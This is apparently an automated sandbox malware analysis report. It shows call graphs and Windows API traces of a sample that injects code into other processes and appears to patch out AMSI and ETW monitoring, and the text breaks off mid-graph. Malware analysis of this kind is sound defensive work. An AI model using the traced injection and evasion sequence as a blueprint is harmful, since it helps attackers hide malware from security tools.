2982f08 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 GetCurrentProcess call 2997944 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 4648->4709 4649->4648 4798 29a7381-29a8977 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 29846a4 * 2 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 * 16 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 ExitProcess 4708->4798 4799 29a6bb6-29a6bc5 call 2984898 4708->4799 5237 29a681c-29a6a28 call 29849a4 call 299c978 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 EnumSystemLocalesA GetCurrentProcess call 2997cc8 GetCurrentProcess call 2997cc8 GetCurrentProcess call 2997cc8 GetCurrentProcess call 2997cc8 GetCurrentProcess call 2997cc8 GetCurrentProcess call 2997cc8 4709->5237 5238 29a6817-29a681a 4709->5238 4799->4798 4807 29a6bcb-29a6e9e call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 299d270 call 298480c call 298494c call 29846a4 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2987e20 4799->4807 5051 29a717b-29a737c call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 29849a4 call 29981b8 4807->5051 5052 29a6ea4-29a7176 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 299cec8 call 2984500 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2984d8c * 2 call 2984734 call 299c7b4 4807->5052 5051->4798 5052->5051 5237->4708 5238->5237
                                                                              APIs
                                                                                • Part of subcall function 02997E14: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,02997F0D), ref: 02997E4C
                                                                                • Part of subcall function 02997E14: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,02997F0D), ref: 02997E5A
                                                                                • Part of subcall function 02997E14: GetProcAddress.KERNEL32(75370000,00000000), ref: 02997E73
                                                                                • Part of subcall function 02997E14: NtFlushInstructionCache.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00000000,029D7364,Function_000065E0,00000004,029D7374,85B025FF,52943FFC,00000040,029D7378,75370000,00000000,00000000,00000000), ref: 02997EE2
                                                                                • Part of subcall function 02997E14: FreeLibrary.KERNEL32(75370000,00000000,00000000,00000000,00000000,029D7364,Function_000065E0,00000004,029D7374,85B025FF,52943FFC,00000040,029D7378,75370000,00000000,00000000), ref: 02997EED
                                                                                • Part of subcall function 02982EE0: QueryPerformanceCounter.KERNEL32 ref: 02982EE4
                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00001000,00000040,ScanBuffer,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,UacScan,029D7358,029A8D7C,ScanBuffer,029D7358,029A8D7C), ref: 029A667E
                                                                                • Part of subcall function 02997944: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02997951
                                                                                • Part of subcall function 02997944: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02997957
                                                                                • Part of subcall function 02997944: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02997977
                                                                              • EnumSystemLocalesA.C:\WINDOWS\SYSTEM32\KERNELBASE(00000000,00000000,ScanBuffer,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,UacScan,029D7358,029A8D7C,ScanBuffer,029D7358,029A8D7C,OpenSession,029D7358), ref: 029A69B0
                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,ScanBuffer,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,UacScan,029D7358,029A8D7C,ScanBuffer,029D7358,029A8D7C,OpenSession,029D7358), ref: 029A69B5
                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,ScanBuffer,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,UacScan,029D7358,029A8D7C,ScanBuffer,029D7358,029A8D7C,OpenSession,029D7358), ref: 029A69C9
                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,ScanBuffer,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,UacScan,029D7358,029A8D7C,ScanBuffer,029D7358,029A8D7C,OpenSession,029D7358), ref: 029A69DD
                                                                                • Part of subcall function 02997CC8: LoadLibraryW.KERNEL32(bcrypt,?,00000894,00000000,029D7384,029999D4,ScanString,029D7384,02999D18,ScanBuffer,029D7384,02999D18,Initialize,029D7384,02999D18,UacScan), ref: 02997CDC
                                                                                • Part of subcall function 02997CC8: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02997CF6
                                                                                • Part of subcall function 02997CC8: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000898,00000000,029D7368,00000001,029D7374,00000000,BCryptVerifySignature,bcrypt,?,00000894,00000000,029D7384,029999D4,ScanString,029D7384,02999D18), ref: 02997D1C
                                                                                • Part of subcall function 02997CC8: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000894,00000000,029D7384,029999D4,ScanString,029D7384,02999D18,ScanBuffer,029D7384,02999D18,Initialize), ref: 02997D32
                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,ScanBuffer,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,UacScan,029D7358,029A8D7C,ScanBuffer,029D7358,029A8D7C,OpenSession,029D7358), ref: 029A69F1
                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,ScanBuffer,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,UacScan,029D7358,029A8D7C,ScanBuffer,029D7358,029A8D7C,OpenSession,029D7358), ref: 029A6A05
                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,ScanBuffer,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,UacScan,029D7358,029A8D7C,ScanBuffer,029D7358,029A8D7C,OpenSession,029D7358), ref: 029A6A19
                                                                                • Part of subcall function 02987E20: GetFileAttributesA.KERNEL32(00000000,?,0299E793,ScanString,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,ScanString,029D7358,029A8D7C,UacScan,029D7358,029A8D7C,UacInitialize), ref: 02987E2B
                                                                                • Part of subcall function 0299C7B4: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0299C886), ref: 0299C7F3
                                                                                • Part of subcall function 0299C7B4: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0299C82D
                                                                                • Part of subcall function 0299C7B4: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0299C85A
                                                                                • Part of subcall function 0299C7B4: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0299C863
                                                                              • ExitProcess.KERNEL32(00000000,OpenSession,029D7358,029A8D7C,ScanBuffer,029D7358,029A8D7C,Initialize,029D7358,029A8D7C,ScanString,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C), ref: 029A8977
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Process$Current$Library$AddressFileProc$FreeHandleLoadMemoryModulePathVirtualWrite$AllocateAttributesCacheCloseCounterCreateEnumExitFlushInstructionLocalesNameName_PerformanceQuerySystem
                                                                              • String ID: Advapi$BCryptVerifySignature$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                              • API String ID: 1226057240-1690217862
                                                                              • Opcode ID: 5e641095b892077b8e4bd6cc68f434687eeb44e4282ad2dd95fbba8cb85c73cd
                                                                              • Instruction ID: 3760c22ea0c867e7fdff9020b3c0b65a752faa61497be61d9728b4c8a76d0ea1
                                                                              • Opcode Fuzzy Hash: 5e641095b892077b8e4bd6cc68f434687eeb44e4282ad2dd95fbba8cb85c73cd
                                                                              • Instruction Fuzzy Hash: 71332B74A1065A8FDB20FBA4DD909DEB3FABFD9310F1454E1E009EB250DA30AE958F51
                                                                              Function 0299A524 Relevance: 64.9, APIs: 14, Strings: 22, Instructions: 1861librarynativeloaderCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 5864 299a524-299a527 5865 299a52c-299a531 5864->5865 5865->5865 5866 299a533-299ac31 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2997a6c call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 GetModuleHandleW GetProcAddress call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 NtOpenProcess call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2982ee0 call 2982f08 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 5865->5866 6097 299c1b2-299c44c call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2997cc8 * 3 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2997cc8 * 6 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 29844d0 * 3 5866->6097 6098 299ac37-299adb1 GetCurrentProcess call 2997944 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 5866->6098 6098->6097 6190 299adb7-299ade7 call 2995884 IsBadReadPtr 6098->6190 6190->6097 6202 299aded-299adf2 6190->6202 6202->6097 6205 299adf8-299ae14 IsBadReadPtr 6202->6205 6205->6097 6207 299ae1a-299ae23 6205->6207 6207->6097 6209 299ae29-299ae4f 6207->6209 6209->6097 6211 299ae55-299afce GetCurrentProcess call 2997944 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 6209->6211 6211->6097 6279 299afd4-299b14a call 2997944 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 6211->6279 6324 299b150-299b3c0 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 299a3b0 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 6279->6324 6325 299c032-299c1ad call 298480c call 298494c call 2984798 call 298494c call 2997cc8 call 298480c call 298494c call 2984798 call 298494c call 2997cc8 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 6279->6325 6445 299b55e-299b6bc call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 6324->6445 6446 299b3c6-299b3c7 6324->6446 6325->6097 6531 299b6e8-299c00c call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 299a3bc call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 GetModuleHandleW GetProcAddress call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 NtWriteVirtualMemory call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 GetModuleHandleW GetProcAddress call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 NtCreateThreadEx call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 6445->6531 6532 299b6be-299b6e3 call 299a300 6445->6532 6447 299b3cb-299b542 call 299a3b0 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 6446->6447 6538 299b547-299b558 6447->6538 6804 299c011-299c018 6531->6804 6532->6531 6538->6445 6538->6447 6804->6097 6805 299c01e-299c02d CloseHandle 6804->6805 6805->6097
                                                                              APIs
                                                                                • Part of subcall function 02997E14: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,02997F0D), ref: 02997E4C
                                                                                • Part of subcall function 02997E14: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,02997F0D), ref: 02997E5A
                                                                                • Part of subcall function 02997E14: GetProcAddress.KERNEL32(75370000,00000000), ref: 02997E73
                                                                                • Part of subcall function 02997E14: NtFlushInstructionCache.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00000000,029D7364,Function_000065E0,00000004,029D7374,85B025FF,52943FFC,00000040,029D7378,75370000,00000000,00000000,00000000), ref: 02997EE2
                                                                                • Part of subcall function 02997E14: FreeLibrary.KERNEL32(75370000,00000000,00000000,00000000,00000000,029D7364,Function_000065E0,00000004,029D7374,85B025FF,52943FFC,00000040,029D7378,75370000,00000000,00000000), ref: 02997EED
                                                                              • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtOpenProcess,UacScan,029D7358,0299C46C,ScanString,029D7358,0299C46C,ScanBuffer,029D7358,0299C46C,Initialize,029D7358,0299C46C,UacScan,029D7358), ref: 0299A7F6
                                                                              • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0299A7FC
                                                                              • NtOpenProcess.NTDLL(029D7560,001F0FFF,029D7324,029D733C), ref: 0299A8F4
                                                                                • Part of subcall function 02982EE0: QueryPerformanceCounter.KERNEL32 ref: 02982EE4
                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,?,?,?,?,0000007C,00000000,00000000), ref: 0299AC47
                                                                                • Part of subcall function 02997944: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02997951
                                                                                • Part of subcall function 02997944: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02997957
                                                                                • Part of subcall function 02997944: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02997977
                                                                              • IsBadReadPtr.KERNEL32(27860000,00000040,?,?,0000007C,00000000,00000000), ref: 0299ADE0
                                                                              • IsBadReadPtr.KERNEL32(?,000000F8,27860000,00000040,?,?,0000007C,00000000,00000000), ref: 0299AE0D
                                                                              • GetCurrentProcess.KERNEL32(00000000,17CF3400,00003000,00000040,?,000000F8,27860000,00000040,?,?,0000007C,00000000,00000000), ref: 0299AE64
                                                                              • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtWriteVirtualMemory,ScanString,029D7358,0299C46C,ScanBuffer,029D7358,0299C46C,UacScan,029D7358,0299C46C,ScanBuffer,029D7358,0299C46C,OpenSession,029D7358), ref: 0299BAA6
                                                                              • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0299BAAC
                                                                              • NtWriteVirtualMemory.NTDLL(06420000,06420000,27A80000,17CF3400,00000000,OpenSession,029D7358,0299C46C,UacInitialize,029D7358,0299C46C,00000000,C:\Windows\System32\ntdll.dll,NtWriteVirtualMemory,ScanString,029D7358), ref: 0299BBBD
                                                                              • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtCreateThreadEx,UacScan,029D7358,0299C46C,ScanString,029D7358,0299C46C,?,?,0000007C,00000000,00000000), ref: 0299BCAB
                                                                              • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0299BCB1
                                                                              • NtCreateThreadEx.NTDLL(029D753C,02000000,029D7324,06421617,06421617,00000000,00000000,00000000,00000000,00000000,00000000,ScanBuffer,029D7358,0299C46C,UacInitialize,029D7358), ref: 0299BF2D
                                                                              • CloseHandle.KERNEL32(00000888,ScanString,029D7358,0299C46C,OpenSession,029D7358,0299C46C,?,?,0000007C,00000000,00000000), ref: 0299C028
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Handle$AddressModuleProc$Process$CurrentLibraryMemoryReadVirtual$AllocateCacheCloseCounterCreateFlushFreeInstructionLoadOpenPerformanceQueryThreadWrite
                                                                              • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Windows\System32\ntdll.dll$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtCreateThreadEx$NtOpenObjectAuditAlarm$NtOpenProcess$NtSetSecurityObject$NtWriteVirtualMemory$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll
                                                                              • API String ID: 415501128-716930375
                                                                              • Opcode ID: b06d056a39288737e31e6e9085492bd0a6c8caec3e117599db8e9b3f58806a9b
                                                                              • Instruction ID: 4df1ee2e91ce6d0aff2b1e19431f6679bc328bf07e5d3213fee2b3afdcf0b54b
                                                                              • Opcode Fuzzy Hash: b06d056a39288737e31e6e9085492bd0a6c8caec3e117599db8e9b3f58806a9b
                                                                              • Instruction Fuzzy Hash: 00F2DE70B501599BDF11FBA8CD80EDEB3FAAFC9710F1450E6A009EB254DA31AE858F51
                                                                              Function 029981B8 Relevance: 54.1, APIs: 8, Strings: 22, Instructions: 1626nativethreadprocessCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 6806 29981b8-29981bb 6807 29981c0-29981c5 6806->6807 6807->6807 6808 29981c7-29982ae call 298493c call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 6807->6808 6839 2999c93-2999cfd call 29844d0 * 2 call 2984c0c call 29844d0 call 29844ac call 29844d0 * 2 6808->6839 6840 29982b4-299838f call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 6808->6840 6840->6839 6884 2998395-29986bd call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 29830d4 * 2 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2984d8c call 2984d9c CreateProcessAsUserW 6840->6884 6991 29986bf-299872b call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 6884->6991 6992 2998730-2998a56 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 29846a4 * 2 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2982ee0 call 2982f08 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 GetThreadContext 6884->6992 6991->6992 6992->6839 7100 2998a5c-2998cbf call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 